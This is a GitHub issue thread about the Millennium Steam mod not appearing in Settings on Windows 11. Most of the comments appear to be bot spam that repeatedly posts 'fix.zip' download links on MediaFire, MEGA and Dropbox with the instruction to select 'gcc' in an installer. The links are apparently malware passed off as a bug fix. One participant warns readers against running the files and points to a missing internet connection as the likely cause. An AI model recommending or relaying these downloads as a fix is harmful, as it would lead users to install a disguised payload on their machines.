### ISSUE TITLE
[Bug]Installed in windows11, but not showing in Settings

### ISSUE THREAD

**Issue by YCZ01111** [SteamClientHomebrew/Millennium#83]
### Before Reporting

- [X] I found no existing issues matching my bug
- [ ] My issue is not caused by the Millennium interface inside Steam (Themes, Plugins & Update Panel). If it is, make a issue report in [this repo](https://github.com/SteamClientHomebrew/Core).
- [X] My issue is not caused by a theme

### Describe the Bug

![QQ图片20240825135045](https://github.com/user-attachments/assets/eeeab262-2e7c-4891-8236-fe8e3c29763b)

### Expected Behavior

I hope it can show in Settings.

### Steps To Reproduce

1.win11
2.put all files into my Steam directory
3.restart steam by -dev

### Operating System

Windows

**Comment by YCZ01111** [comment]
I tested two Win10 and two Win11, and both Win11 failed

**Comment by YCZ01111** [comment]
> 下载 https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file 在安装程序菜单中，选择“gcc”。

![image](https://github.com/user-attachments/assets/2d9de223-033c-45de-97b6-4cd2b8d64b73)
haha

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ShadowMonster99** [comment]
Hopefully you didn't run any of the files the bots put in here, never try downloading pre-compiled binaries from a random person in a thread. Anyways, you need an internet connection on the initial setup of Millennium (which is likely what is causing the issue)

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
